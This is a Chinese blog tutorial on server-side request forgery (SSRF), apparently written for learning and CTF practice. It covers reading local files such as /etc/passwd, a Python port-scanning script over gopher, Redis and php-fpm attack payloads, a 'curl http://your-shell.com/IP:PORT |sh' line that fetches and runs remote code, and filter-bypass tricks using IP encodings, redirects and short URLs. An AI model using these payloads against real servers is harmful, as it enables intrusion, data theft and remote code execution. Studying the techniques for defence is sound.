SSRF (服务端请求伪造)
创始人
2024-09-25 20:52:20
0

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

c9b349d844784b9c920902604a87df86.png

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

 

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做技术交流与学习...

目录

SSRF

特点:

条件:

判断:

URL格式:

SSRF的利用面:

1 任意文件读取

2 探测内网资源

3 使用gopher协议扩展攻击面

ssrf端口开放检测脚本:

redis 6379 :

 mysql 3306:

 php-fpm:

Gopherus-master工具(py2) 

 php原生类进行ssrf

ssrf绕过:

1 enclosed alphanumerics 绕过:

2 使用IP地址转换

3 特殊语法绕过

4 如果对方可以接受302跳转,并且跟进302跳转

302.php 

5 利用短网址绕过


 

SSRF

Server-side Request Forgery 服务端请求伪造.  攻击者向服务端发送包含恶意url连接的请求,借由服务端发起请求-- 以便获取服务端网络内部的资源   一句话总结: 控制服务端使用指定协议访问指定的url 

特点:

1 让别人访问我们访问不到的url 2 拿到自己本来拿不到的数据

条件:

1 别人能帮我访问url 服务端有接受url地址并进行访问的功能(请求是服务端发起的) 2 url地址外部可控

判断:

9394c8fe13b94995bdab7a82d2404ef7.png

https://xxx.com/index.php?url=http://www.baidu.com //index.php-->  是不是属于ssrf? ======================== 告诉浏览器,你去访问这个地址  此时,浏览器,是客户端还是服务端?  客户端    此时,服务器没有访问这个Url,只是告诉你浏览器,去跳转到这个地址去 是浏览器去访问,不是服务端去访问(location) 所以,不是SSRF 只能算 任意跳转漏洞

分清  是否是ssrf?
url地址可控

http://10.xx.xx.xx/        
file:///etc/passwd


URL格式:

URL = scheme:[//authority]path[?query][#fragment] schema: 协议头 :// authority  [userinfo@]host[:port] 默认使用80端口,而80端口默认情况下,是可以省略  http://www.baidu.com/robots.txt ---> 本质,就是 通过指定的协议,访问互联网上某台服务器的某个资源或者某个文件 默认使用匿名账户访问--- userinfo: username:password@host  schema://username:password@host:port/path?a=b#top http://ctfer:hacker@www.baidu.com/robots.txt     //任意匿名都能访问

必须知道要读的文件名(通配符不支持)


SSRF的利用面:

1 任意文件读取

--前提是知道要读取的文件名

2 探测内网资源

127.0.0.1 mysql服务端监听了127.0.0.1这个地址,也就表示,只能通过127.0.0.1这个IP来访问 0.0.0.0 表示允许任意ip访问 192.168.233.233 只允许特定的IP地址访问 (探测到此服务器同内网的服务器)

3 使用gopher协议扩展攻击面

// 只负责将数据转发到某端口.

 apache/nginx 80  tomcat 8080  node 3000  flask 8080  php-fpm 9000  mysql 3306  ftp 21  ssh 22  redis 6379  #21 ftp #22 ssh #80 http #443 https #3389 rdp windows远程桌面 #1433 ms-sqlserver 默认端口 #3306 mysql 默认端口 #6379 redis 默认端口 #9000 php-fpm 默认端口

ssrf端口开放检测脚本:

import requests url = "" # 端口自己变 ports = [21,22,80,443,3389,1433,3306,6379] for p in ports:     try:         data={"url":f"gopher://127.0.0.1:{p}/"}         response = requests.post(url=url,data=data,timeout=2) #超时2秒就认为端口开了.     except:         print(f"端口{p}开放")

file:///etc/nginx/nginx.conf 


redis 6379 :

支持key-value    gopher://127.0.0.1:6379/_save_/var/www/html/1.php_

 mysql 3306:

用户密码为空   select ')' 

 php-fpm:

php-fpm 默认监听9000端口,而且只允许本机127.0.0.1这个地址访问  主要负责对.php文件的代码解释执行   ----->  我们可以通过向9000端口发送格式的请求,来让9000端口背后的php-fpm帮我们处理我们提交的php代码 ----  通过向9000端口发送php执行请求  设置php.ini中的运行参数  其中使用 auto_append_file 来指定 php://input 包含恶意代码,然后执行  为了能使用auto_append_file参数,必须有一个存在的php文件来使用这个配置项  curl http://your-shell.com/IP:PORT |sh

 


 

Gopherus-master工具(py2) 

ssrf----生成数据库...的payload
实战时注意二次编码等等

27e1b25104df4db78f3c79f21c38fd5e.png


 php原生类进行ssrf

php_soap

php_soap php -m   //查看安装的插件,扩展  $soap = new SoapClient($_GET['url']); $soap->hack();  //访问任意不存在方法。 //$soap->__call() //不存在就调用__call方法  --访问不存在的地址, --只支持http url可控时,可以发送内网请求 

 

ssrf绕过:

只要不允许它访问本地地址即可,也就是说,过滤的目的是,不让访问127.0.0.1地址

1 enclosed alphanumerics 绕过:

127.0.0.1 -> 127.⓿.⓿.1
(有些环境 Linux可用)


2 使用IP地址转换

IP地址十六进制、二进制、十进制转换-ME2在线工具

在线IP地址转八进制数字 - 八进制转IP地址 - IP转八进制在线工具—LZL在线工具

https://www.metools.info/other/ipconvert162.html https://lzltool.cn/Tools/IpToOct 所有的域名->IP   ip可以使用不同进制来表示   127.0.0.1用不同进制可以表示为 - 2130706433  10进制 http://2130706433   - 017700000001 8进制 http://017700000001  - 7F000001 16进制   http://0x7F000001  -二进制不行.

3 特殊语法绕过

Windows 下 0 代表的是0.0.0.0  而Linux 下 0 代表的是127.0.0.1  127.0.0.1 可以省略为 127.1	(省略) 127。0。0。1 可以替代127.0.0.1	(中文点)

4 如果对方可以接受302跳转,并且跟进302跳转

可以发送http的协议。但是返回的location为其他协议 http://xxx.com/302.php?schema=gopher&host=127.0.0.1&port=9000&payload=xxxx --把要构建的要素发给302跳转,让它帮我们组装一个.  302.php  //服务端接受302跳转,我们跟进一下.

302.php 


5 利用短网址绕过

在线短链接生成工具 - 免费短网址转换 - toolfk

https://toolfk-api.xiuxiandou.com/zh-cn/tools/short-url.html baidu.com  不允许出现baidu  或者限制了url长度,我们可以切换为短网址,来绕过长度的限制

 


 

 

相关内容

热门资讯

安卓系统app更新软件,And... 亲爱的手机控们,你们有没有发现,最近你的手机里那些熟悉的APP们,好像都悄悄地换上了新装呢?没错,安...
手机怎么安双卡安卓系统,轻松实... 你有没有想过,拥有一部可以同时使用两张SIM卡的手机是多么的方便呢?想象一张卡用来工作,另一张卡用来...
安卓系统卸载软件api,功能与... 手机里的软件越来越多,是不是感觉内存都要不够用了?别急,今天就来给你揭秘安卓系统卸载软件的神秘面纱,...
miui操作系统和安卓系统,深... 亲爱的手机控们,今天咱们来聊聊一个让无数米粉心动的系统——MIUI操作系统,还有那个它背后的老大哥—...
原生安卓系统使用教学,原生安卓... 哇,你手里拿的那部手机,是不是也觉得它有点儿特别呢?它可能没有那些花里胡哨的界面,但它却有着自己独特...
安卓系统玩咸鱼之王,三国名将助... 你有没有发现,最近安卓系统上的游戏圈里,有一款叫做《咸鱼之王》的游戏火得一塌糊涂?没错,就是那个让你...
鸿蒙1.0系统是安卓系统吗,揭... 你有没有听说最近华为的鸿蒙1.0系统?是不是有点好奇,这鸿蒙1.0系统是不是安卓系统的“亲戚”呢?别...
优盘安卓系统用桃,U盘安装An... 你有没有想过,你的电脑也能变身成安卓手机?没错,就是那种可以安装各种APP、玩游戏的安卓手机!这可不...
怎样使用安卓8系统,安卓8系统... 你有没有想过,你的安卓手机其实是个小智能助手,只要你会使用,它能帮你做很多事情呢!今天,就让我来带你...
鼎威安卓系统版本,性能升级与用... 你有没有发现,现在车机系统越来越智能了?这不,鼎威的安卓系统版本就让我眼前一亮。想象坐在车里,手指轻...
安卓系统安装抢红包,轻松成为抢... 亲爱的手机控们,是不是每次微信群里抢红包都感觉手慢无?别急,今天我要给你揭秘如何在安卓系统上轻松安装...
写ios系统和安卓系统的人,揭... 你有没有想过,那些默默无闻的程序员们,他们是如何创造出我们每天离不开的iOS系统和安卓系统呢?想象他...
安卓系统设计尺寸规范,适配与优... 亲爱的设计师们,你是否在为安卓系统的设计尺寸规范而头疼?别担心,今天我要带你一起探索这个神秘的领域,...
旧主机改安卓系统,安卓系统改造... 亲爱的读者们,你是否有过这样的经历:家里的旧主机闲置在角落,看着它那略显过时的外观,心里不禁感叹:“...
安卓系统里有趣的,尽在掌握 探索安卓乐园:那些让你笑出声的趣味游戏 开篇:手机里的欢乐小天地想象你手握一部安卓手机,屏幕上跳动...
法兰规格查询系统安卓,安卓版功... 你有没有想过,在繁忙的工程现场,如何快速找到合适的法兰规格呢?别急,今天就来给你揭秘一个神器——法兰...
目前安卓系统最高配置,极致性能... 你有没有发现,现在的手机越来越厉害了,就像是科幻电影里的高科技产品一样。今天,咱们就来聊聊这个话题:...
安卓修改系统返回键,个性化设置... 你有没有发现,手机里的那个小小的返回键,有时候就像是个顽皮的小家伙,让你摸不着头脑?别急,今天就来教...
安卓订餐系统教程视频,从设计到... 你是不是也和我一样,每天忙碌的生活中,最期待的就是那一顿美味的午餐或晚餐呢?现在,有了安卓订餐系统,...
安卓系统限制外部软件,探索外部... 亲爱的手机控们,你是否曾遇到过这样的烦恼:明明打开了“未知来源”,却还是无法安装那些心仪的外部软件?...